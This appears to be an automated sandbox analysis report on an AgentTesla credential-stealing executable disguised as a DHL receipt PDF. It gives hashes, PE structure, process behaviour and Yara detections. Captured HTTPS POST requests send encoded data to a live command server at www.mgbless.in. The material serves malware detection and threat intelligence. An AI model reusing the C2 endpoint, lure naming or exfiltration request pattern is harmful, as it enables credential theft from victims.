                        SHA256:3905a71c3e23f4845d1201f74ac1c9c041b0254ff486a3ea4fc2bb7119631ce9
                        SHA512:cd79fa44a5fdbf9b2c1d7e3d37d4b7236fb01515968d2474fc1936feb9987a50fd884b48762f222b6b079dfa1094e9f0c85149bb11ede086e1ddf4668584eb59
                        SSDEEP:12288:UxRhb0PixBFmEkNkyqTDfVRehcS/MjMm/NrGa3zC+NHisv3ez0i:Uxrb0Pi1KNOTDfGc2+/VDNY
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A.a..............0.................. ........@.. ....................................@................................

                        File Icon

                        Icon Hash:f0f8f8d0dcf8e2de

                        Static PE Info

                        General

                        Entrypoint:0x47bbbe
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Time Stamp:0x619F4116 [Thu Nov 25 07:53:58 2021 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:v4.0.30319
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                        Entrypoint Preview

                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [ebp+0800000Eh], ch
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x7bb6c0x4f.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x7c0000x2dde0.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xaa0000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000x79bd40x79c00False0.897364684933data7.8827247031IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .rsrc0x7c0000x2dde00x2de00False0.355899821185data5.72844498197IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0xaa0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountry
                        RT_ICON0x7c2b00x5dbcPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                        RT_ICON0x8206c0x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                        RT_ICON0x928940x94a8data
                        RT_ICON0x9bd3c0x5488data
                        RT_ICON0xa11c40x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 2130706432
                        RT_ICON0xa53ec0x25a8data
                        RT_ICON0xa79940x10a8data
                        RT_ICON0xa8a3c0x988data
                        RT_ICON0xa93c40x468GLS_BINARY_LSB_FIRST
                        RT_GROUP_ICON0xa982c0x84data
                        RT_VERSION0xa98b00x344data
                        RT_MANIFEST0xa9bf40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                        Imports

                        DLLImport
                        mscoree.dll_CorExeMain

                        Version Infos

                        DescriptionData
                        Translation0x0000 0x04b0
                        LegalCopyrightCopyright Rogers Peet
                        Assembly Version8.0.6.0
                        InternalNameIsJitIntrins.exe
                        FileVersion5.6.0.0
                        CompanyNameRogers Peet
                        LegalTrademarks
                        Comments
                        ProductNameBiblan
                        ProductVersion5.6.0.0
                        FileDescriptionBiblan
                        OriginalFilenameIsJitIntrins.exe

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 25, 2021 11:37:41.246987104 CET49747443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:37:41.247031927 CET44349747104.223.93.105192.168.2.3
                        Nov 25, 2021 11:37:41.247118950 CET49747443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:37:41.275937080 CET49747443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:37:41.275964022 CET44349747104.223.93.105192.168.2.3
                        Nov 25, 2021 11:37:41.542495966 CET44349747104.223.93.105192.168.2.3
                        Nov 25, 2021 11:37:41.542597055 CET49747443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:37:41.547097921 CET49747443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:37:41.547120094 CET44349747104.223.93.105192.168.2.3
                        Nov 25, 2021 11:37:41.547430038 CET44349747104.223.93.105192.168.2.3
                        Nov 25, 2021 11:37:41.587377071 CET49747443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:37:41.915136099 CET49747443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:37:41.956881046 CET44349747104.223.93.105192.168.2.3
                        Nov 25, 2021 11:37:42.047307014 CET44349747104.223.93.105192.168.2.3
                        Nov 25, 2021 11:37:42.048023939 CET49747443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:37:42.048060894 CET44349747104.223.93.105192.168.2.3
                        Nov 25, 2021 11:37:42.500540018 CET44349747104.223.93.105192.168.2.3
                        Nov 25, 2021 11:37:42.525439978 CET44349747104.223.93.105192.168.2.3
                        Nov 25, 2021 11:37:42.525577068 CET49747443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:37:42.527692080 CET49747443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:38:42.831408024 CET49819443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:38:42.831454992 CET44349819104.223.93.105192.168.2.3
                        Nov 25, 2021 11:38:42.832500935 CET49819443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:38:42.833035946 CET49819443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:38:42.833064079 CET44349819104.223.93.105192.168.2.3
                        Nov 25, 2021 11:38:43.098479033 CET44349819104.223.93.105192.168.2.3
                        Nov 25, 2021 11:38:43.139399052 CET49819443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:38:43.187263012 CET49819443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:38:43.187300920 CET44349819104.223.93.105192.168.2.3
                        Nov 25, 2021 11:38:43.355566978 CET44349819104.223.93.105192.168.2.3
                        Nov 25, 2021 11:38:43.356745958 CET49819443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:38:43.356787920 CET44349819104.223.93.105192.168.2.3
                        Nov 25, 2021 11:38:43.784686089 CET44349819104.223.93.105192.168.2.3
                        Nov 25, 2021 11:38:43.812783003 CET44349819104.223.93.105192.168.2.3
                        Nov 25, 2021 11:38:43.812917948 CET49819443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:38:43.813591003 CET49819443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:38:56.141171932 CET49822443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:38:56.141217947 CET44349822104.223.93.105192.168.2.3
                        Nov 25, 2021 11:38:56.141346931 CET49822443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:38:56.141766071 CET49822443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:38:56.141783953 CET44349822104.223.93.105192.168.2.3
                        Nov 25, 2021 11:38:56.389071941 CET44349822104.223.93.105192.168.2.3
                        Nov 25, 2021 11:38:56.393414974 CET49822443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:38:56.393449068 CET44349822104.223.93.105192.168.2.3
                        Nov 25, 2021 11:38:56.643780947 CET44349822104.223.93.105192.168.2.3
                        Nov 25, 2021 11:38:56.644398928 CET49822443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:38:56.644427061 CET44349822104.223.93.105192.168.2.3
                        Nov 25, 2021 11:38:56.995098114 CET44349822104.223.93.105192.168.2.3
                        Nov 25, 2021 11:38:57.015686035 CET44349822104.223.93.105192.168.2.3
                        Nov 25, 2021 11:38:57.015961885 CET49822443192.168.2.3104.223.93.105
                        Nov 25, 2021 11:38:57.017235041 CET49822443192.168.2.3104.223.93.105

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 25, 2021 11:37:40.972887993 CET5280653192.168.2.38.8.8.8
                        Nov 25, 2021 11:37:41.123454094 CET53528068.8.8.8192.168.2.3
                        Nov 25, 2021 11:37:41.190479040 CET5391053192.168.2.38.8.8.8
                        Nov 25, 2021 11:37:41.231338024 CET53539108.8.8.8192.168.2.3
                        Nov 25, 2021 11:38:42.598434925 CET5377753192.168.2.38.8.8.8
                        Nov 25, 2021 11:38:42.753036022 CET53537778.8.8.8192.168.2.3
                        Nov 25, 2021 11:38:42.791912079 CET5710653192.168.2.38.8.8.8
                        Nov 25, 2021 11:38:42.829755068 CET53571068.8.8.8192.168.2.3
                        Nov 25, 2021 11:38:55.962332010 CET6098253192.168.2.38.8.8.8
                        Nov 25, 2021 11:38:56.100920916 CET53609828.8.8.8192.168.2.3
                        Nov 25, 2021 11:38:56.107340097 CET5805853192.168.2.38.8.8.8
                        Nov 25, 2021 11:38:56.139935970 CET53580588.8.8.8192.168.2.3

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Nov 25, 2021 11:37:40.972887993 CET192.168.2.38.8.8.80xe1dStandard query (0)www.mgbless.inA (IP address)IN (0x0001)
                        Nov 25, 2021 11:37:41.190479040 CET192.168.2.38.8.8.80xcbf0Standard query (0)www.mgbless.inA (IP address)IN (0x0001)
                        Nov 25, 2021 11:38:42.598434925 CET192.168.2.38.8.8.80xa932Standard query (0)www.mgbless.inA (IP address)IN (0x0001)
                        Nov 25, 2021 11:38:42.791912079 CET192.168.2.38.8.8.80x55caStandard query (0)www.mgbless.inA (IP address)IN (0x0001)
                        Nov 25, 2021 11:38:55.962332010 CET192.168.2.38.8.8.80x4e9Standard query (0)www.mgbless.inA (IP address)IN (0x0001)
                        Nov 25, 2021 11:38:56.107340097 CET192.168.2.38.8.8.80x543dStandard query (0)www.mgbless.inA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Nov 25, 2021 11:37:41.123454094 CET8.8.8.8192.168.2.30xe1dNo error (0)www.mgbless.inmgbless.inCNAME (Canonical name)IN (0x0001)
                        Nov 25, 2021 11:37:41.123454094 CET8.8.8.8192.168.2.30xe1dNo error (0)mgbless.in104.223.93.105A (IP address)IN (0x0001)
                        Nov 25, 2021 11:37:41.231338024 CET8.8.8.8192.168.2.30xcbf0No error (0)www.mgbless.inmgbless.inCNAME (Canonical name)IN (0x0001)
                        Nov 25, 2021 11:37:41.231338024 CET8.8.8.8192.168.2.30xcbf0No error (0)mgbless.in104.223.93.105A (IP address)IN (0x0001)
                        Nov 25, 2021 11:38:42.753036022 CET8.8.8.8192.168.2.30xa932No error (0)www.mgbless.inmgbless.inCNAME (Canonical name)IN (0x0001)
                        Nov 25, 2021 11:38:42.753036022 CET8.8.8.8192.168.2.30xa932No error (0)mgbless.in104.223.93.105A (IP address)IN (0x0001)
                        Nov 25, 2021 11:38:42.829755068 CET8.8.8.8192.168.2.30x55caNo error (0)www.mgbless.inmgbless.inCNAME (Canonical name)IN (0x0001)
                        Nov 25, 2021 11:38:42.829755068 CET8.8.8.8192.168.2.30x55caNo error (0)mgbless.in104.223.93.105A (IP address)IN (0x0001)
                        Nov 25, 2021 11:38:56.100920916 CET8.8.8.8192.168.2.30x4e9No error (0)www.mgbless.inmgbless.inCNAME (Canonical name)IN (0x0001)
                        Nov 25, 2021 11:38:56.100920916 CET8.8.8.8192.168.2.30x4e9No error (0)mgbless.in104.223.93.105A (IP address)IN (0x0001)
                        Nov 25, 2021 11:38:56.139935970 CET8.8.8.8192.168.2.30x543dNo error (0)www.mgbless.inmgbless.inCNAME (Canonical name)IN (0x0001)
                        Nov 25, 2021 11:38:56.139935970 CET8.8.8.8192.168.2.30x543dNo error (0)mgbless.in104.223.93.105A (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • www.mgbless.in

                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.349747104.223.93.105443C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe
                        TimestampkBytes transferredDirectionData
                        2021-11-25 10:37:41 UTC0OUTPOST /mac/inc/0bb73b6c7ade1a.php HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                        Content-Type: application/x-www-form-urlencoded
                        Host: www.mgbless.in
                        Content-Length: 368
                        Expect: 100-continue
                        Connection: Keep-Alive
                        2021-11-25 10:37:42 UTC0INHTTP/1.1 100 Continue
                        2021-11-25 10:37:42 UTC0OUTData Raw: 70 3d 5a 47 36 55 79 69 79 41 68 64 31 47 51 6d 33 56 64 69 4f 46 4a 4c 55 33 74 59 51 4c 31 59 49 58 4b 66 78 61 49 68 6b 4d 63 54 52 49 71 49 4f 62 35 37 62 67 42 51 48 77 33 7a 52 39 6f 73 39 74 63 71 4f 34 36 57 7a 38 38 44 25 32 42 30 38 25 32 42 73 62 73 30 6a 75 25 32 42 77 42 65 30 76 66 62 54 46 32 65 7a 59 66 37 4b 44 31 61 56 6d 31 68 25 32 42 45 7a 46 68 6a 47 77 45 7a 44 67 37 71 79 44 41 6a 4e 77 25 32 42 30 6d 4e 59 4a 71 46 59 51 4d 59 46 68 47 4d 4a 52 63 4e 42 31 36 65 4d 45 2f 79 6f 76 67 37 50 78 49 37 63 4f 25 32 42 48 73 6d 71 78 76 61 30 53 38 37 7a 6c 41 39 45 6f 25 32 42 4b 35 33 74 35 6c 43 6a 63 37 6b 43 73 39 72 65 76 64 75 4c 4f 6c 59 45 57 6c 37 67 59 51 79 71 46 57 54 35 65 47 75 52 61 39 58 68 55 44 4c 51 58 75 36 76 4c 73
                        Data Ascii: p=ZG6UyiyAhd1GQm3VdiOFJLU3tYQL1YIXKfxaIhkMcTRIqIOb57bgBQHw3zR9os9tcqO46Wz88D%2B08%2Bsbs0ju%2BwBe0vfbTF2ezYf7KD1aVm1h%2BEzFhjGwEzDg7qyDAjNw%2B0mNYJqFYQMYFhGMJRcNB16eME/yovg7PxI7cO%2BHsmqxva0S87zlA9Eo%2BK53t5lCjc7kCs9revduLOlYEWl7gYQyqFWT5eGuRa9XhUDLQXu6vLs
                        2021-11-25 10:37:42 UTC0INHTTP/1.1 200 OK
                        Date: Thu, 25 Nov 2021 10:37:41 GMT
                        Server: Apache
                        Connection: close
                        Transfer-Encoding: chunked
                        Content-Type: text/html; charset=UTF-8
                        2021-11-25 10:37:42 UTC0INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.349819104.223.93.105443C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe
                        TimestampkBytes transferredDirectionData
                        2021-11-25 10:38:43 UTC0OUTPOST /mac/inc/0bb73b6c7ade1a.php HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                        Content-Type: application/x-www-form-urlencoded
                        Host: www.mgbless.in
                        Content-Length: 370
                        Expect: 100-continue
                        2021-11-25 10:38:43 UTC1INHTTP/1.1 100 Continue
                        2021-11-25 10:38:43 UTC1OUTData Raw: 70 3d 6e 39 79 71 75 57 71 74 53 67 4a 47 51 6d 33 56 64 69 4f 46 4a 4c 55 33 74 59 51 4c 31 59 49 58 4b 66 78 61 49 68 6b 4d 63 54 52 49 71 49 4f 62 35 37 62 67 42 51 48 77 33 7a 52 39 6f 73 39 74 63 71 4f 34 36 57 7a 38 38 44 25 32 42 30 38 25 32 42 73 62 73 30 6a 75 25 32 42 77 42 65 30 76 66 62 54 46 32 65 7a 59 66 37 4b 44 31 61 56 6d 31 68 25 32 42 45 7a 46 68 6a 47 77 45 7a 44 67 37 71 79 44 41 6a 4e 77 25 32 42 30 6d 4e 59 4a 71 46 59 51 4d 59 46 68 47 4d 4a 52 63 4e 42 31 36 65 4d 45 2f 79 6f 76 67 37 50 78 49 37 63 4f 25 32 42 48 73 6d 71 78 76 61 30 53 38 37 7a 6c 41 39 45 6f 25 32 42 4b 35 33 74 35 6c 43 33 53 50 66 63 49 6b 64 78 78 39 4d 33 48 4a 71 76 6d 25 32 42 4b 43 6f 51 79 71 46 57 54 35 65 47 75 52 61 39 58 68 55 44 4c 51 58 75 36 76
                        Data Ascii: p=n9yquWqtSgJGQm3VdiOFJLU3tYQL1YIXKfxaIhkMcTRIqIOb57bgBQHw3zR9os9tcqO46Wz88D%2B08%2Bsbs0ju%2BwBe0vfbTF2ezYf7KD1aVm1h%2BEzFhjGwEzDg7qyDAjNw%2B0mNYJqFYQMYFhGMJRcNB16eME/yovg7PxI7cO%2BHsmqxva0S87zlA9Eo%2BK53t5lC3SPfcIkdxx9M3HJqvm%2BKCoQyqFWT5eGuRa9XhUDLQXu6v
                        2021-11-25 10:38:43 UTC1INHTTP/1.1 200 OK
                        Date: Thu, 25 Nov 2021 10:38:42 GMT
                        Server: Apache
                        Connection: close
                        Transfer-Encoding: chunked
                        Content-Type: text/html; charset=UTF-8
                        2021-11-25 10:38:43 UTC1INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        2192.168.2.349822104.223.93.105443C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe
                        TimestampkBytes transferredDirectionData
                        2021-11-25 10:38:56 UTC1OUTPOST /mac/inc/0bb73b6c7ade1a.php HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                        Content-Type: application/x-www-form-urlencoded
                        Host: www.mgbless.in
                        Content-Length: 380
                        Expect: 100-continue
                        2021-11-25 10:38:56 UTC1INHTTP/1.1 100 Continue
                        2021-11-25 10:38:56 UTC1OUTData Raw: 70 3d 69 48 6a 63 79 44 6c 45 77 66 35 47 51 6d 33 56 64 69 4f 46 4a 4c 55 33 74 59 51 4c 31 59 49 58 4b 66 78 61 49 68 6b 4d 63 54 52 49 71 49 4f 62 35 37 62 67 42 51 48 77 33 7a 52 39 6f 73 39 74 63 71 4f 34 36 57 7a 38 38 44 25 32 42 30 38 25 32 42 73 62 73 30 6a 75 25 32 42 77 42 65 30 76 66 62 54 46 32 65 7a 59 66 37 4b 44 31 61 56 6d 31 68 25 32 42 45 7a 46 68 6a 47 77 45 7a 44 67 37 71 79 44 41 6a 4e 77 25 32 42 30 6d 4e 59 4a 71 46 59 51 4d 59 46 68 47 4d 4a 52 63 4e 42 31 36 65 4d 45 2f 79 6f 76 67 37 50 78 49 37 63 4f 25 32 42 48 73 6d 71 78 76 61 30 53 38 37 7a 6c 41 39 45 6f 25 32 42 4b 35 33 74 35 6c 43 70 39 72 4d 6b 66 55 2f 52 52 54 50 50 74 69 42 56 31 7a 4d 4e 59 51 79 71 46 57 54 35 65 47 75 52 61 39 58 68 55 44 4c 51 58 75 36 76 4c 73
                        Data Ascii: p=iHjcyDlEwf5GQm3VdiOFJLU3tYQL1YIXKfxaIhkMcTRIqIOb57bgBQHw3zR9os9tcqO46Wz88D%2B08%2Bsbs0ju%2BwBe0vfbTF2ezYf7KD1aVm1h%2BEzFhjGwEzDg7qyDAjNw%2B0mNYJqFYQMYFhGMJRcNB16eME/yovg7PxI7cO%2BHsmqxva0S87zlA9Eo%2BK53t5lCp9rMkfU/RRTPPtiBV1zMNYQyqFWT5eGuRa9XhUDLQXu6vLs
                        2021-11-25 10:38:56 UTC2INHTTP/1.1 200 OK
                        Date: Thu, 25 Nov 2021 10:38:56 GMT
                        Server: Apache
                        Connection: close
                        Transfer-Encoding: chunked
                        Content-Type: text/html; charset=UTF-8
                        2
                        []
                        2021-11-25 10:38:57 UTC2INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Code Manipulations

                        Statistics

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Start time:11:37:16
                        Start date:25/11/2021
                        Path:C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe"
                        Imagebase:0x4b0000
                        File size:687616 bytes
                        MD5 hash:A9B63C434E205092B3373E35C051A04A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.309960102.000000000293B000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.309824480.0000000002871000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.310307492.000000000387D000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.310307492.000000000387D000.00000004.00000001.sdmp, Author: Joe Security
                        Reputation:low

                        General

                        Start time:11:37:20
                        Start date:25/11/2021
                        Path:C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\Desktop\DHL_119040 ontvangstbewijs,pdf.exe
                        Imagebase:0x500000
                        File size:687616 bytes
                        MD5 hash:A9B63C434E205092B3373E35C051A04A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000000.305861427.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000000.305861427.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000000.306305831.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000000.306305831.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000000.306831919.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000000.306831919.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000000.307479462.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000000.307479462.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.566852760.0000000002811000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.566852760.0000000002811000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.564785123.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.564785123.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.567348132.0000000002960000.00000004.00000001.sdmp, Author: Joe Security
                        Reputation:low

                        Disassembly

                        Code Analysis

                        Reset < >